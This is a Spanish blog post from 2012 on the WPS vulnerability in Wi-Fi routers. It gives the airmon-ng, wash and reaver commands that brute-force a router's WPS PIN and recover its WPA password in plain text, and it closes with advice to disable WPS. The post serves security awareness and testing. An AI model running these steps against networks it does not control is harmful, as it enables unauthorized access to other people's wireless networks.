lunes, 31 de diciembre de 2012

Vulnerabilidad WIFI mediante WPS

Compartir este artículo:
Hola a tod@s!

WPS o Wi-Fi Protected Setup como dice la Wikipedia WPS es un estándar promovido por la Wi-Fi Alliance para la creación de redes WLAN seguras. En otras palabras, WPS no es un mecanismo de seguridad por sí, se trata de la definición de diversos mecanismos para facilitar la configuración de una red WLAN segura con WPA2, pensados para minimizar la intervención del usuario en entornos domésticos o pequeñas oficinas (SOHO). Concretamente, WPS define los mecanismos a través de los cuales los diferentes dispositivos de la red obtienen las credenciales (SSID y PSK) necesarias para iniciar el proceso de autenticación.

Vamos al lío. Lo primero nos descargamos Reaver.Una vez situados en la carpeta donde descargamos Reaver lo descomprimiremos:

airmon-ng start wlan0

wash -i mon0

reaver -i mon0 -b 00:00:00:00:00:00 -vv   (En este paso os dará el PIN, atentos)

reaver -i mon0 -b 00:00:00:00:00:00 -p PIN -vv  (Y listo os dará en texto plano la clave)

Este método de sacar la clave resulta un poco pesado, pues puede durar entre uno y tres horas dependiendo de la calidad de la señal.

Os dejo con este vídeo que me sirvió mucho para realizar estas pruebas. Y señores desactiven WPS de sus routers.

[youtube 0Fs_hRuRZ8U nolink]

No seáis malos ;)

Artículo cortesía de Francisco Javier Santiago Vázquez (Estación Informática)

3 comentarios:

  1. ¡Buenas! ¿Cómo va? Una duda con respecto a explotar esta vulnerabilidad: ¿Es necesario haber apretado el botón WPS para que funcione? ¿O funciona simplemente por tenerlo activado? Sería una falla muy grave si fuera así nada mas...Saludos

    ResponderEliminar
  2. Hola chicos teniendo WPS activo ya es vulnerable a este ataque.

    ResponderEliminar

Related Posts Plugin for WordPress, Blogger...